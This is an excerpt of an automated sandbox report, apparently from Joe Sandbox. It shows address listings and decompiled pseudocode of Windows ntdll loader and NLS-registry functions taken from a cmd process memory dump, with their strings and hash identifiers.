                                                                                                                                          0x03be87a3
                                                                                                                                          0x03be87a8
                                                                                                                                          0x03be87c3
                                                                                                                                          0x03be87c3
                                                                                                                                          0x03be87c8
                                                                                                                                          0x03be87d1
                                                                                                                                          0x03be87d4
                                                                                                                                          0x03be87d8
                                                                                                                                          0x03be87e5
                                                                                                                                          0x03be87ec
                                                                                                                                          0x03c39bfe
                                                                                                                                          0x03c39c00
                                                                                                                                          0x03c39c02
                                                                                                                                          0x03c39c08
                                                                                                                                          0x03c39c0d
                                                                                                                                          0x03c39c0f
                                                                                                                                          0x03c39c14
                                                                                                                                          0x03c39c2d
                                                                                                                                          0x03c39c32
                                                                                                                                          0x03c39c37
                                                                                                                                          0x03c39c3a
                                                                                                                                          0x03c39c3c
                                                                                                                                          0x03c39c42
                                                                                                                                          0x03c39c42
                                                                                                                                          0x03c39c3c
                                                                                                                                          0x03c39c02
                                                                                                                                          0x03be87da
                                                                                                                                          0x03be87df
                                                                                                                                          0x03be87e3
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03be87e3
                                                                                                                                          0x03be87f2
                                                                                                                                          0x00000000
                                                                                                                                          0x03be87fb
                                                                                                                                          0x03be87fd
                                                                                                                                          0x03be87fe
                                                                                                                                          0x03be880e
                                                                                                                                          0x03be880f
                                                                                                                                          0x03be8810
                                                                                                                                          0x03be8814
                                                                                                                                          0x03be881a
                                                                                                                                          0x03be881c
                                                                                                                                          0x03be881f
                                                                                                                                          0x03be8821
                                                                                                                                          0x03be8822
                                                                                                                                          0x03be8824
                                                                                                                                          0x03be8826
                                                                                                                                          0x03be882c
                                                                                                                                          0x03be882e
                                                                                                                                          0x03c39c48
                                                                                                                                          0x03c39c48
                                                                                                                                          0x03be8834
                                                                                                                                          0x03be8834
                                                                                                                                          0x03be8837
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03be8837
                                                                                                                                          0x03be882e
                                                                                                                                          0x03be883d
                                                                                                                                          0x03be8840
                                                                                                                                          0x03be8843
                                                                                                                                          0x03be8846
                                                                                                                                          0x03be8849
                                                                                                                                          0x03be884c
                                                                                                                                          0x03be884e
                                                                                                                                          0x03be8850
                                                                                                                                          0x03be8852
                                                                                                                                          0x03be8854
                                                                                                                                          0x03be8857
                                                                                                                                          0x03be88b4
                                                                                                                                          0x03be88b6
                                                                                                                                          0x03be88b6
                                                                                                                                          0x03be8859
                                                                                                                                          0x03be8859
                                                                                                                                          0x03be8859
                                                                                                                                          0x03be8861
                                                                                                                                          0x03be8866
                                                                                                                                          0x03be886a
                                                                                                                                          0x03be893d
                                                                                                                                          0x03be8941
                                                                                                                                          0x00000000
                                                                                                                                          0x03be8947
                                                                                                                                          0x03be8947
                                                                                                                                          0x03be894a
                                                                                                                                          0x03be894c
                                                                                                                                          0x00000000
                                                                                                                                          0x03be8952
                                                                                                                                          0x03be8955
                                                                                                                                          0x03be895a
                                                                                                                                          0x03be895d
                                                                                                                                          0x03be895d
                                                                                                                                          0x03be895f
                                                                                                                                          0x03be8961
                                                                                                                                          0x03be8961
                                                                                                                                          0x03be8968
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03be896a
                                                                                                                                          0x03be896b
                                                                                                                                          0x03be896e
                                                                                                                                          0x00000000
                                                                                                                                          0x03be8970
                                                                                                                                          0x03be8970
                                                                                                                                          0x03be8970
                                                                                                                                          0x03be8970
                                                                                                                                          0x03be8972
                                                                                                                                          0x03be8972
                                                                                                                                          0x03be8974
                                                                                                                                          0x00000000
                                                                                                                                          0x03be897a
                                                                                                                                          0x03be897a
                                                                                                                                          0x03be897d
                                                                                                                                          0x00000000
                                                                                                                                          0x03be8983
                                                                                                                                          0x03c39c65
                                                                                                                                          0x03c39c6d
                                                                                                                                          0x03c39c72
                                                                                                                                          0x03c39c75
                                                                                                                                          0x03c39c75
                                                                                                                                          0x03c39c82
                                                                                                                                          0x03c39c86
                                                                                                                                          0x03c39c87
                                                                                                                                          0x03c39c88
                                                                                                                                          0x03c39c89
                                                                                                                                          0x03c39c8c
                                                                                                                                          0x03c39c90
                                                                                                                                          0x03c39c95
                                                                                                                                          0x03c39c97
                                                                                                                                          0x03c39ca0
                                                                                                                                          0x03c39ca3
                                                                                                                                          0x03c39ca9
                                                                                                                                          0x03c39ca9
                                                                                                                                          0x00000000
                                                                                                                                          0x03c39ca9
                                                                                                                                          0x03c39ca3
                                                                                                                                          0x00000000
                                                                                                                                          0x03c39c97
                                                                                                                                          0x03be897d
                                                                                                                                          0x00000000
                                                                                                                                          0x03be8974
                                                                                                                                          0x03be8988
                                                                                                                                          0x03be8992
                                                                                                                                          0x03be8996
                                                                                                                                          0x00000000
                                                                                                                                          0x03be8996
                                                                                                                                          0x03be894c
                                                                                                                                          0x00000000
                                                                                                                                          0x03be8870
                                                                                                                                          0x03be887b
                                                                                                                                          0x03be887d
                                                                                                                                          0x03be887f
                                                                                                                                          0x03be8881
                                                                                                                                          0x03be8884
                                                                                                                                          0x03be8884
                                                                                                                                          0x03be8886
                                                                                                                                          0x03be8889
                                                                                                                                          0x03be888c
                                                                                                                                          0x03be888e
                                                                                                                                          0x03be8891
                                                                                                                                          0x03be8891
                                                                                                                                          0x03be8898
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03be889a
                                                                                                                                          0x03be889b
                                                                                                                                          0x03be889e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03be88a0
                                                                                                                                          0x03be88a8
                                                                                                                                          0x03be88b0
                                                                                                                                          0x03be88b2
                                                                                                                                          0x03be88d3
                                                                                                                                          0x03be88d5
                                                                                                                                          0x00000000
                                                                                                                                          0x03be88d7
                                                                                                                                          0x03be88db
                                                                                                                                          0x03be88dc
                                                                                                                                          0x03be88e0
                                                                                                                                          0x03be88e8
                                                                                                                                          0x03be88ee
                                                                                                                                          0x03be88f0
                                                                                                                                          0x03be88f3
                                                                                                                                          0x03be88fc
                                                                                                                                          0x03be8901
                                                                                                                                          0x03be8906
                                                                                                                                          0x03be890c
                                                                                                                                          0x03be890c
                                                                                                                                          0x03be890f
                                                                                                                                          0x03be8916
                                                                                                                                          0x03be8917
                                                                                                                                          0x03be8918
                                                                                                                                          0x03be8919
                                                                                                                                          0x03be891a
                                                                                                                                          0x03be891f
                                                                                                                                          0x03be8921
                                                                                                                                          0x03c39c52
                                                                                                                                          0x03c39c55
                                                                                                                                          0x03c39c5b
                                                                                                                                          0x03c39cac
                                                                                                                                          0x03c39cc0
                                                                                                                                          0x03c39cc0
                                                                                                                                          0x03c39c55
                                                                                                                                          0x03be8927
                                                                                                                                          0x03be8927
                                                                                                                                          0x03be892f
                                                                                                                                          0x03be8933
                                                                                                                                          0x00000000
                                                                                                                                          0x03be88f5
                                                                                                                                          0x03be88f5
                                                                                                                                          0x00000000
                                                                                                                                          0x03be88f7
                                                                                                                                          0x03be88f7
                                                                                                                                          0x03be88fa
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03be88fa
                                                                                                                                          0x03be88f5
                                                                                                                                          0x03be88f3
                                                                                                                                          0x00000000
                                                                                                                                          0x03be88d5
                                                                                                                                          0x00000000
                                                                                                                                          0x03be88b2
                                                                                                                                          0x03be88c9
                                                                                                                                          0x00000000
                                                                                                                                          0x03be88c9
                                                                                                                                          0x03be887f
                                                                                                                                          0x03be886a
                                                                                                                                          0x03be8857
                                                                                                                                          0x03be8852
                                                                                                                                          0x03be88bf
                                                                                                                                          0x03be88bf
                                                                                                                                          0x03be87aa
                                                                                                                                          0x03be87ad
                                                                                                                                          0x03be87ae
                                                                                                                                          0x03be87b4
                                                                                                                                          0x03be87b5
                                                                                                                                          0x03be87b6
                                                                                                                                          0x03be87b8
                                                                                                                                          0x03be87bd
                                                                                                                                          0x03be87c1
                                                                                                                                          0x03be87f4
                                                                                                                                          0x03be87fa
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03be87c1
                                                                                                                                          0x00000000

                                                                                                                                          Strings
                                                                                                                                          • LdrpDoPostSnapWork, xrefs: 03C39C1E
                                                                                                                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03C39C18
                                                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 03C39C28
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                                                          • API String ID: 0-1948996284
                                                                                                                                          • Opcode ID: 2496c99f772f651980cbecf78bbf4658ce3342593de3c7bcc1b735280bd26e72
                                                                                                                                          • Instruction ID: 53613a0c83fc8d5e0832edd40058eafd78fa05f3af22eaf4f55f757a367821c6
                                                                                                                                          • Opcode Fuzzy Hash: 2496c99f772f651980cbecf78bbf4658ce3342593de3c7bcc1b735280bd26e72
                                                                                                                                          • Instruction Fuzzy Hash: 1691DF35A00A1A9FDB18DF5DD881ABAB3B5FF45B08B0941F9D805EB250DB70ED41DB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BE7E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                          			E03BE7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E03BECEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E03BDC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x3cc5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E03C55510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x3cc5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E03BF7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03BF7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E03C57016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E03BF7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03BF7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E03C57016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E03C0A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E03BDB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                                                                          0x03be7e4c
                                                                                                                                          0x03be7e50
                                                                                                                                          0x03be7e55
                                                                                                                                          0x03be7e58
                                                                                                                                          0x03be7e5d
                                                                                                                                          0x03be7e71
                                                                                                                                          0x03be7f33
                                                                                                                                          0x03be7e77
                                                                                                                                          0x03be7e77
                                                                                                                                          0x03be7e79
                                                                                                                                          0x03be7e79
                                                                                                                                          0x03be7e7e
                                                                                                                                          0x03be7f45
                                                                                                                                          0x03c39848
                                                                                                                                          0x00000000
                                                                                                                                          0x03c39848
                                                                                                                                          0x03be7f4e
                                                                                                                                          0x03be7f53
                                                                                                                                          0x03be7f5a
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3985a
                                                                                                                                          0x03c39862
                                                                                                                                          0x03c39866
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3986c
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3986c
                                                                                                                                          0x03be7e84
                                                                                                                                          0x03be7e84
                                                                                                                                          0x03be7e8d
                                                                                                                                          0x03c39871
                                                                                                                                          0x03be7eb8
                                                                                                                                          0x03be7ec0
                                                                                                                                          0x03be7ec0
                                                                                                                                          0x03be7e9a
                                                                                                                                          0x03c3987e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c39884
                                                                                                                                          0x03c3988b
                                                                                                                                          0x03c398a7
                                                                                                                                          0x03c398ac
                                                                                                                                          0x03c398b1
                                                                                                                                          0x03c398b6
                                                                                                                                          0x03c398b8
                                                                                                                                          0x03c398b8
                                                                                                                                          0x03c398b9
                                                                                                                                          0x00000000
                                                                                                                                          0x03c398b9
                                                                                                                                          0x03be7ea0
                                                                                                                                          0x03be7ea7
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03be7eac
                                                                                                                                          0x03be7eb1
                                                                                                                                          0x03be7ec6
                                                                                                                                          0x03be7ed0
                                                                                                                                          0x03c398cc
                                                                                                                                          0x03be7ed6
                                                                                                                                          0x03be7ed6
                                                                                                                                          0x03be7ed6
                                                                                                                                          0x03be7ede
                                                                                                                                          0x03be7ee3
                                                                                                                                          0x03c398e3
                                                                                                                                          0x03c398f0
                                                                                                                                          0x03c39902
                                                                                                                                          0x03c398f2
                                                                                                                                          0x03c398fb
                                                                                                                                          0x03c398fb
                                                                                                                                          0x03c39907
                                                                                                                                          0x03c3991d
                                                                                                                                          0x03c3991d
                                                                                                                                          0x03c39907
                                                                                                                                          0x03c398e3
                                                                                                                                          0x03be7ef0
                                                                                                                                          0x03be7f14
                                                                                                                                          0x03be7f14
                                                                                                                                          0x03be7f1e
                                                                                                                                          0x03c39946
                                                                                                                                          0x03be7f24
                                                                                                                                          0x03be7f24
                                                                                                                                          0x03be7f24
                                                                                                                                          0x03be7f2c
                                                                                                                                          0x03c3996a
                                                                                                                                          0x03c39975
                                                                                                                                          0x03c39975
                                                                                                                                          0x03c3997e
                                                                                                                                          0x03c39993
                                                                                                                                          0x03c39993
                                                                                                                                          0x03c3997e
                                                                                                                                          0x00000000
                                                                                                                                          0x03be7ef2
                                                                                                                                          0x03be7efc
                                                                                                                                          0x03be7f0a
                                                                                                                                          0x03be7f0e
                                                                                                                                          0x03c39933
                                                                                                                                          0x00000000
                                                                                                                                          0x03c39933
                                                                                                                                          0x00000000
                                                                                                                                          0x03be7f0e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03be7eb1

                                                                                                                                          Strings
                                                                                                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 03C39891
                                                                                                                                          • LdrpCompleteMapModule, xrefs: 03C39898
                                                                                                                                          • minkernel\ntdll\ldrmap.c, xrefs: 03C398A2
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                          • API String ID: 0-1676968949
                                                                                                                                          • Opcode ID: 0fd34770b83e614b114be5a0e420ed0b0a0e32969bbc6f2d5c886bc739939848
                                                                                                                                          • Instruction ID: 63d3a26480d9813f913b2c68bbee19823ac4f4512e5d91872c13deb5229245b2
                                                                                                                                          • Opcode Fuzzy Hash: 0fd34770b83e614b114be5a0e420ed0b0a0e32969bbc6f2d5c886bc739939848
                                                                                                                                          • Instruction Fuzzy Hash: DE51EF366007489BDB21CB6CC945B6ABBE8EB41318F0805E9E951DB7E1DB74ED40C791
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BDE620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                          			E03BDE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E03BDF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E03C195D0();
						}
						if(_t78 != 0) {
							L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E03C1FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E03C1BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E03C19600();
					if(_t97 < 0) {
						goto L6;
					}
					E03C1BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L03BDF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E03C1BB40(_t83, _t102 + 0x24, _t78);
								if(L03BE43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E03C1BB40(_t84, _t102 + 0x24, _t94);
									if(L03BE43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                                                                          0x03bde620
                                                                                                                                          0x03bde628
                                                                                                                                          0x03bde62f
                                                                                                                                          0x03bde631
                                                                                                                                          0x03bde635
                                                                                                                                          0x03bde637
                                                                                                                                          0x03bde63e
                                                                                                                                          0x03c35503
                                                                                                                                          0x03c35503
                                                                                                                                          0x03bde64c
                                                                                                                                          0x03bde64c
                                                                                                                                          0x03bde651
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bde661
                                                                                                                                          0x03bde665
                                                                                                                                          0x03c3542a
                                                                                                                                          0x03bde715
                                                                                                                                          0x03bde71a
                                                                                                                                          0x03bde71c
                                                                                                                                          0x03bde720
                                                                                                                                          0x03bde720
                                                                                                                                          0x03bde727
                                                                                                                                          0x03bde736
                                                                                                                                          0x03bde736
                                                                                                                                          0x03bde743
                                                                                                                                          0x03bde743
                                                                                                                                          0x03bde673
                                                                                                                                          0x03bde678
                                                                                                                                          0x03bde67d
                                                                                                                                          0x03bde682
                                                                                                                                          0x03bde685
                                                                                                                                          0x03bde692
                                                                                                                                          0x03bde69b
                                                                                                                                          0x03bde6a3
                                                                                                                                          0x03bde6ad
                                                                                                                                          0x03bde6b1
                                                                                                                                          0x03bde6b2
                                                                                                                                          0x03bde6bb
                                                                                                                                          0x03bde6bf
                                                                                                                                          0x03bde6c0
                                                                                                                                          0x03bde6c8
                                                                                                                                          0x03bde6cc
                                                                                                                                          0x03bde6d5
                                                                                                                                          0x03bde6d9
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bde6e5
                                                                                                                                          0x03bde6ea
                                                                                                                                          0x03bde6f9
                                                                                                                                          0x03bde70b
                                                                                                                                          0x03bde70f
                                                                                                                                          0x03c35439
                                                                                                                                          0x03c3545e
                                                                                                                                          0x03c3545e
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3545e
                                                                                                                                          0x03c3543b
                                                                                                                                          0x03c3543e
                                                                                                                                          0x03c35440
                                                                                                                                          0x03c35445
                                                                                                                                          0x03c35472
                                                                                                                                          0x03c35475
                                                                                                                                          0x03c3548d
                                                                                                                                          0x03c35493
                                                                                                                                          0x03c354a9
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c354ab
                                                                                                                                          0x03c354b4
                                                                                                                                          0x03c354bc
                                                                                                                                          0x03c354c8
                                                                                                                                          0x03c354de
                                                                                                                                          0x03c354fb
                                                                                                                                          0x03c354e0
                                                                                                                                          0x03c354e6
                                                                                                                                          0x03c354eb
                                                                                                                                          0x03c354eb
                                                                                                                                          0x03c354de
                                                                                                                                          0x00000000
                                                                                                                                          0x03c354bc
                                                                                                                                          0x03c35477
                                                                                                                                          0x03c3547a
                                                                                                                                          0x03c35480
                                                                                                                                          0x03c35483
                                                                                                                                          0x03c35486
                                                                                                                                          0x03c3548b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3548b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c35447
                                                                                                                                          0x03c35447
                                                                                                                                          0x03c35447
                                                                                                                                          0x03c35447
                                                                                                                                          0x03c3544e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c35450
                                                                                                                                          0x03c35452
                                                                                                                                          0x03c35455
                                                                                                                                          0x03c3545a
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3545c
                                                                                                                                          0x03c3546a
                                                                                                                                          0x03c3546d
                                                                                                                                          0x03c3546f
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3546f
                                                                                                                                          0x03bde70f

                                                                                                                                          Strings
                                                                                                                                          • InstallLanguageFallback, xrefs: 03BDE6DB
                                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 03BDE68C
                                                                                                                                          • @, xrefs: 03BDE6C0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                                          • API String ID: 0-1757540487
                                                                                                                                          • Opcode ID: 2d1f06a845879d81fb07b053d2c09abd4547aa5a6dbb6148a422ccdf9ccefb13
                                                                                                                                          • Instruction ID: 633493a1b556c5870e9927c8445e94f2971c36ebaffead452173782ed1c1bc78
                                                                                                                                          • Opcode Fuzzy Hash: 2d1f06a845879d81fb07b053d2c09abd4547aa5a6dbb6148a422ccdf9ccefb13
                                                                                                                                          • Instruction Fuzzy Hash: 1C51B4765083459BC714DF25C440AABB3E8BF8A718F09097EF985DB240FB34DA04C7A2
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C9E539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 60%
                                                                                                                                          			E03C9E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E03C9BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E03C9BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E03C9AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E03C19730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E03C9A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
